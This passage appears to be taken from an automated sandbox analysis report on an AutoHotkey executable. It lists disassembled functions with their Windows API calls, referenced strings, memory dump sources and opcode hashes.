                                      • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 00481629
                                      • CloseHandle.KERNEL32 ref: 00481638
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Process$AllocCloseHandleOpenThreadVirtualWindow
                                      • String ID:
                                      • API String ID: 1013503288-0
                                      • Opcode ID: f247b511ef46b28126af1a26d27ff3412baba6ab3328ecc03e9fca9b3d2e7a29
                                      • Instruction ID: 60d107b5dff1fd0e60dd254d61aab202f8a08bdd50287d55a53eb4f998f358f7
                                      • Opcode Fuzzy Hash: f247b511ef46b28126af1a26d27ff3412baba6ab3328ecc03e9fca9b3d2e7a29
                                      • Instruction Fuzzy Hash: E0F082B6A01311ABD3255B649C08F5B7B6CEF84B61F24452AFA42D7680EB70DC0197A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041E4E0 Relevance: 6.0, APIs: 4, Instructions: 20windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnableMenuItem.USER32(00000000,0000FF81,00000003), ref: 0041E4EE
                                      • EnableMenuItem.USER32(00000000,0000FF7E,00000003), ref: 0041E4F7
                                      • EnableMenuItem.USER32(00000000,0000FF7F,00000003), ref: 0041E500
                                      • EnableMenuItem.USER32(00000000,0000FF80,00000003), ref: 0041E509
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: EnableItemMenu
                                      • String ID:
                                      • API String ID: 1841910628-0
                                      • Opcode ID: f97a54db526022fa76798f5d7bfc4ad6a1b3129deb0ab12f86dfa04ed05d8be4
                                      • Instruction ID: fca6d26e299f2ea7337f153b89e4a009eca9ba6fa7e85bfc99b5995bf2c20ebf
                                      • Opcode Fuzzy Hash: f97a54db526022fa76798f5d7bfc4ad6a1b3129deb0ab12f86dfa04ed05d8be4
                                      • Instruction Fuzzy Hash: A2D0025164E31739B43572625CC5CFF5D2DDF8BEE87400175F208159C44E455C03B1B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413660 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00413664
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • _free.LIBCMT ref: 0041366D
                                      • _free.LIBCMT ref: 00413676
                                      • _free.LIBCMT ref: 00413688
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: a91f6eb0df0ba6d29e1b356d990f13e0e3db7684d703cc87d03d8b15ae3669a0
                                      • Instruction ID: a4e4ae7e3a16c23ef25e1f3eb53d49daa413cf1787a4baf86af575fb1420ec27
                                      • Opcode Fuzzy Hash: a91f6eb0df0ba6d29e1b356d990f13e0e3db7684d703cc87d03d8b15ae3669a0
                                      • Instruction Fuzzy Hash: 5FD012715007006BCA34AF7AC846D5777A4EB48345F004A1EB15747541CA3CE4558BD7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441750 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 276windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • SendMessageTimeoutW.USER32(00000000,?,00000000,00000000,00000002,00001388,?), ref: 004418C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundMessageSendTimeoutVisible
                                      • String ID: FAIL
                                      • API String ID: 578228273-2964506365
                                      • Opcode ID: a460d76a58c960010d12709893393ba5e3be52f6f56c1514e11f71a419e7539a
                                      • Instruction ID: 956156c659f570289104875140b4bf30c8ab6279fb6c064a89c13a48d975642f
                                      • Opcode Fuzzy Hash: a460d76a58c960010d12709893393ba5e3be52f6f56c1514e11f71a419e7539a
                                      • Instruction Fuzzy Hash: F6A11671B042005BE720DF19D881F67B7A5EB84324F24856FE8459B392CB7ADCC5C799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004033F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00403C50: GetTickCount.KERNEL32 ref: 00403C82
                                      • GetTickCount.KERNEL32 ref: 0040347D
                                      • _wcsncpy.LIBCMT ref: 004034F3
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000D), ref: 00401072
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040107A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick$_wcsncpy
                                      • String ID: Timer
                                      • API String ID: 1301760726-2870079774
                                      • Opcode ID: f7f272da6595213af45e88c846dd494fb4eacd8793c2f2922e589e4d79e26674
                                      • Instruction ID: c5d5dbeef1621366e49dddfe3045f8176f911f31e56115fb0c194f31054b6721
                                      • Opcode Fuzzy Hash: f7f272da6595213af45e88c846dd494fb4eacd8793c2f2922e589e4d79e26674
                                      • Instruction Fuzzy Hash: 6B51DF706043446BD731AF209841B67BBA9AB4130AF14097FE982677D1C779EE88C79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00456300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __swprintf
                                      • String ID: %0.*f
                                      • API String ID: 1857805200-3326200935
                                      • Opcode ID: a8465d567f7a8d181ec6aa9a53aac1d44b5860a42e3707b37d4785da9cfd563e
                                      • Instruction ID: 8b0b2b1fccc27e2f13843933ccdfe818fae9353c15688cadf16f52b42510f1dc
                                      • Opcode Fuzzy Hash: a8465d567f7a8d181ec6aa9a53aac1d44b5860a42e3707b37d4785da9cfd563e
                                      • Instruction Fuzzy Hash: E3417470604604DBC700BF1AE945259BBB4FF89316F1105AFED8993262DB388829C78F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004126A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 00412703
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      Strings
                                      • Out of memory., xrefs: 00412719
                                      • Hotstring max abbreviation length is 40., xrefs: 004126D5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_malloc
                                      • String ID: Hotstring max abbreviation length is 40.$Out of memory.
                                      • API String ID: 501242067-4290233147
                                      • Opcode ID: 6dab1be68013e9fb7c379603de57655dd8842e2fe4532529a691aac134ec9b3f
                                      • Instruction ID: 38a4ccb9424a2e85991cb51b4b2f3c1baa4bf87bae825ad5b848b303e677f8ce
                                      • Opcode Fuzzy Hash: 6dab1be68013e9fb7c379603de57655dd8842e2fe4532529a691aac134ec9b3f
                                      • Instruction Fuzzy Hash: F041B9B06043419FD744DF28C950B9777A0FB88318F488A2FE469C73A0E778D891CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004096CB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004096D0
                                        • Part of subcall function 004054CE: __EH_prolog.LIBCMT ref: 004054D3
                                      Strings
                                      • <property name="%e" fullname="%e" type="%s" facet="%s" classname="%s" address="%p" size="0" page="%i" pagesize="%i" children="%i" numchildren="%i">, xrefs: 00409757
                                      • <property name="%e" fullname="%e" type="%s" size="0" page="0" pagesize="%i" children="%i" numchildren="%i">, xrefs: 004097FC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: <property name="%e" fullname="%e" type="%s" facet="%s" classname="%s" address="%p" size="0" page="%i" pagesize="%i" children="%i" numchildren="%i">$<property name="%e" fullname="%e" type="%s" size="0" page="0" pagesize="%i" children="%i" numchildren="%i">
                                      • API String ID: 3519838083-126030962
                                      • Opcode ID: 66d80b8982df5ad9c8c3e30b142b7142b98fc252d4eb4a2c710387da923470ce
                                      • Instruction ID: e0e16285a871e254ec9e8a2accc364f53dfe5d85df6f702ec7122443a9ec0ccd
                                      • Opcode Fuzzy Hash: 66d80b8982df5ad9c8c3e30b142b7142b98fc252d4eb4a2c710387da923470ce
                                      • Instruction Fuzzy Hash: 6141657A610601DFCB28CF15C980E6ABBF6FF88304B14856EE8569B7A2D735EC11CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040786F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?,?,?,tw@,004079C5), ref: 00407966
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide
                                      • String ID: %u">$tw@
                                      • API String ID: 626452242-1419491401
                                      • Opcode ID: 37034768986416f79b5d892bebbb98b7221bd8b40e13ee0e1b73b724ea3251f2
                                      • Instruction ID: f2d841f6e42ff71f85d94efde8c8dfb2a10db64d73d94b5e9afccfa1aeb8d0df
                                      • Opcode Fuzzy Hash: 37034768986416f79b5d892bebbb98b7221bd8b40e13ee0e1b73b724ea3251f2
                                      • Instruction Fuzzy Hash: 4E31C872D04105AFEF10AF94C840AAE7769EB44764F548137E910B72C0D378BE41DB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00484330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,004B0CF8,00432D3F,?,004B0CF8,?,00000000,00000000), ref: 00484365
                                      • IsWindowVisible.USER32(00000000), ref: 0048437F
                                        • Part of subcall function 004844A0: GetForegroundWindow.USER32(?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 004844F7
                                        • Part of subcall function 004844A0: IsWindowVisible.USER32(00000000), ref: 00484513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundVisible
                                      • String ID: ?-C
                                      • API String ID: 4078700383-529084794
                                      • Opcode ID: 2bcaca533c319f157176ebc2ab5121f4f9eccac48239b7959bd7bd3867e65a3f
                                      • Instruction ID: e7df5b706dff28624cba392fe7f5c9c92e05ac259fbb47937f3dab680ecd774b
                                      • Opcode Fuzzy Hash: 2bcaca533c319f157176ebc2ab5121f4f9eccac48239b7959bd7bd3867e65a3f
                                      • Instruction Fuzzy Hash: F121B162B002175BCB21FE55D841A2FB7E99BD2765F04495AFC0097781E77CDC8483AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsncpy.LIBCMT ref: 0041145B
                                        • Part of subcall function 00411570: _memset.LIBCMT ref: 00411587
                                        • Part of subcall function 004118C0: __wcsicoll.LIBCMT ref: 00411928
                                        • Part of subcall function 004118C0: GetKeyboardLayout.USER32(00000000), ref: 00411943
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: KeyboardLayout__wcsicoll_memset_wcsncpy
                                      • String ID: & $~
                                      • API String ID: 3335490538-4238529414
                                      • Opcode ID: 156e6ded4cc92f8d1fd6ad7fa3b91f5d95bb7bbe1e935d71df4820a700e268ca
                                      • Instruction ID: 12d5d7b9b1af21647edd01bb51ffe43c259ed73faf075e8769fdf25e971ef760
                                      • Opcode Fuzzy Hash: 156e6ded4cc92f8d1fd6ad7fa3b91f5d95bb7bbe1e935d71df4820a700e268ca
                                      • Instruction Fuzzy Hash: 79312876A443446BDB30E746C885AFF73E9DBD9314F40481EFA5983351F27898C583AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00428353 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: MCA$Parameter #3 invalid.
                                      • API String ID: 2691759472-426094000
                                      • Opcode ID: 095c56a03202e7ae516ffee4e4c558eb86b170fb80caa82cc50e579f8528c177
                                      • Instruction ID: 66d9a94311a100ac9d1fdc1c1a02357e71ebad1a0c56e47cd88ad610425ba93c
                                      • Opcode Fuzzy Hash: 095c56a03202e7ae516ffee4e4c558eb86b170fb80caa82cc50e579f8528c177
                                      • Instruction Fuzzy Hash: DB31D3347083649FEB24CB1AE4487A3B7E1AB81314F98489FE9854B352C37DDC41C76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004395F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: Line#$--->
                                      • API String ID: 1735881322-1677359465
                                      • Opcode ID: 88c64845ce57c21b478698e4940f62b280d9cfec558ca7d7eae52d0798e1ba5c
                                      • Instruction ID: 825ff8b15a29b67e8dbd47c1069d68af603ebbec2116dc6db00848bea2936222
                                      • Opcode Fuzzy Hash: 88c64845ce57c21b478698e4940f62b280d9cfec558ca7d7eae52d0798e1ba5c
                                      • Instruction Fuzzy Hash: A22101717053015FC718DE298886BABB3E5EBC8304F18562EEA56D3390D6B4AC09879A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042B3B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0042B40A
                                      • _wcschr.LIBCMT ref: 0042B425
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AttributesFile_wcschr
                                      • String ID: .ahk
                                      • API String ID: 3504862186-1610153849
                                      • Opcode ID: 19497a09d5214a8a8e2b3604a52d9abf62eda482ff5dd22e3492dcf1208907e8
                                      • Instruction ID: 9fbf4377431b103dc8eb4b848d934524a350b2c652ae0b9910b49c70eb1c4229
                                      • Opcode Fuzzy Hash: 19497a09d5214a8a8e2b3604a52d9abf62eda482ff5dd22e3492dcf1208907e8
                                      • Instruction Fuzzy Hash: 1E21F631A002268BC710DF28EC8196B7364EF81318F41462EE946C7272E738E966C7D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00476670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InsertMenuItemW.USER32(00000000,00000000,00000001,00000030), ref: 00476722
                                        • Part of subcall function 00477020: __wcsicoll.LIBCMT ref: 00477048
                                      • GetMenuItemCount.USER32(00000000), ref: 0047670C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ItemMenu$CountInsert__wcsicoll
                                      • String ID: 0
                                      • API String ID: 858756630-4108050209
                                      • Opcode ID: 7a11bf2055d5bf36ca9172e3f2b414399eb22f143072960c14da987f1530301c
                                      • Instruction ID: 7b4776afdb01a585c8b44e5c4e53bbae3461c34a55470b2501b8c736af6ea667
                                      • Opcode Fuzzy Hash: 7a11bf2055d5bf36ca9172e3f2b414399eb22f143072960c14da987f1530301c
                                      • Instruction Fuzzy Hash: 59216D716187019FD724CF69D404A6BBBE8EB88720F008A1EF89AC7790D774E904CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00451175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ErrorLast__itow
                                      • String ID: 0
                                      • API String ID: 2292283701-4108050209
                                      • Opcode ID: 9fcbe08d7aea0c672310a0b02af8be1dafefa8270c26c951cfadd9da7ab8edda
                                      • Instruction ID: 19ef22b64f1cf6183a4932d0585aeeabbedf8743b5dfe9319148beeff767fc39
                                      • Opcode Fuzzy Hash: 9fcbe08d7aea0c672310a0b02af8be1dafefa8270c26c951cfadd9da7ab8edda
                                      • Instruction Fuzzy Hash: 97214A74E012089BDB14DF98D881BEEBBB0FB48311F10429AED15A73A1D7746845CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00483650 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
